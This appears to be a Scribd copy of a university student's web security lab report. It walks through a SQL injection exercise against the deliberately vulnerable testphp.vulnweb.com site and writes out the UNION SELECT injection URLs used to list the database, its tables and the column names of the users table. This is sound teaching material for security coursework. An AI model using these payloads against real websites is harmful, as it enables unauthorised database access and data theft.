Scribd
Upload
58 views11 pages

Web & Mobile Security Lab 20CSP-338: Bachelor Degree of Engineering

This document is a lab report submitted by Param Sahai for their Web and Mobile Security lab course. The document includes an introduction, lab index, and details of Experiment 1.4 which explores performing SQL injection attacks from the command line. The steps demonstrate injecting malicious SQL queries into the URL of a vulnerable website to view the database name and table names. Screenshots show the results, including retrieving column names from the users table. An evaluation grid is included at the end to be completed by the faculty.

Uploaded by

War Lock
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
58 views11 pages

Web & Mobile Security Lab 20CSP-338: Bachelor Degree of Engineering

This document is a lab report submitted by Param Sahai for their Web and Mobile Security lab course. The document includes an introduction, lab index, and details of Experiment 1.4 which explores performing SQL injection attacks from the command line. The steps demonstrate injecting malicious SQL queries into the URL of a vulnerable website to view the database name and table names. Screenshots show the results, including retrieving column names from the users table. An evaluation grid is included at the end to be completed by the faculty.

Uploaded by

War Lock
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 11

WEB & MOBILE SECURITY LAB

20CSP-338
Submitted for the requirement of

Lab Course

Bachelor Degree of Engineering

COMPUTER SCIENCE & ENGINEERING

Submitted to: Submitted By:


Er. Jayesh Surana Param Sahai
20BCS5964

DEPARTMENT OF COMPUTER SCIENCE & ENGINEERING


CHANDIGARH UNIVERSITY, GHARUAN
August-December 2022
LAB INDEX

NAME: Param Sahai UID: 20BCS5964


SUBJECT NAME: WMS Lab SUBJECT CODE: 20CSP-338
Class/Section: 619/A

Sr. Program Date Evaluation Sign


No LW VV FW Total
(12) (8) (10) (30)
1. Identify Http packet on a monitoring tool like 09/08/2022
Wireshark.

2. Design a method to stimulate the html injection and 16/08/2022


cross site scripting to exploit the attackers.

3. Understand How to find CSRF Vulnerability. 28/08/2022

4. Understand how to perform SQL injection. 29/09/2022

ii
Param Sahai
20BCS5964
Experiment 1.4

1. Aim/Overview of the practical:


To understand how to perform SQL Injection Attack from the command line (URL).

2. Task to be done/ Which logistics used:


To perform SQL Queries to obtain data using SQL Command Line Injection.
SQL Injection: SQL Injection (SQLi) is a type of an injection attack that makes it possible to execute malicious
SQL statements. These statements control a database server behind a web application. Attackers can use SQL
Injection vulnerabilities to bypass application security measures. They can go around authentication and
authorization of a web page or web application and retrieve the content of the entire SQL database. They can also
use SQL Injection to add, modify, and delete records in the database.

TestPhp.Vulneb: Vulnerable site that we’ll be using to perform SQL injection.

3. Steps:

i. Here we’ll be using another vulnerable site -VULNEB.

ii. Now, Copy and paste the following link : http://testphp.vulnweb.com/listproducts.php?cat=1 .

iii. Next, insert the malicious query (url) by adding – before 1, i.e
http://testphp.vulnweb.com/listproducts.php?cat=-1

iv. We can also put random number in the url along with the order by clause.

v. Now, in order to check the database, search : http://testphp.vulnweb.com/listproducts.php?cat=-1 union


select 1,2,3,4,5,6,7,8,9,10, database ()--

vi. For checking the Tablename :


http://testphp.vulnweb.com/listproducts.php?cat=1%20union%20select%201,2,3,4,5,6,7,8,9,10,
group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema
=database()--

1
Param Sahai
20BCS5964
Fig 1.4.1 (How does a SQL Injection attack works)

2
Param Sahai
20BCS5964
4. Screenshots:

Fig 1.4.2 (Opening a vulnerable site : VULNEB )

3
Param Sahai
20BCS5964
Fig 1.4.3 (Checking out our query with cat=1)

4
Param Sahai
20BCS5964
Fig 1.4.4 (Checking out our query with cat=-1)

5
Param Sahai
20BCS5964
Fig 1.4.5 (Performing Union Select Query for checking out the Database)

6
Param Sahai
20BCS5964
Fig 1.4.6 (Performing Union Select Query for checking out the Tablename)

7
Param Sahai
20BCS5964
Maybe we can get some important data from the users table, so let’s penetrate more inside. Again,
Use the concat function for table users for retrieving its entire column names.
We successfully retrieve all eight column names from inside the table users.

Fig 1.4.7 (Retrieving the Column Names using concat function)

8
Param Sahai
20BCS5964
Evaluation Grid (To be created as per the SOP and Assessment guidelines by the faculty):

Sr. No. Parameters Marks Obtained Maximum Marks


1.
2.
3.

9
Param Sahai
20BCS5964

You might also like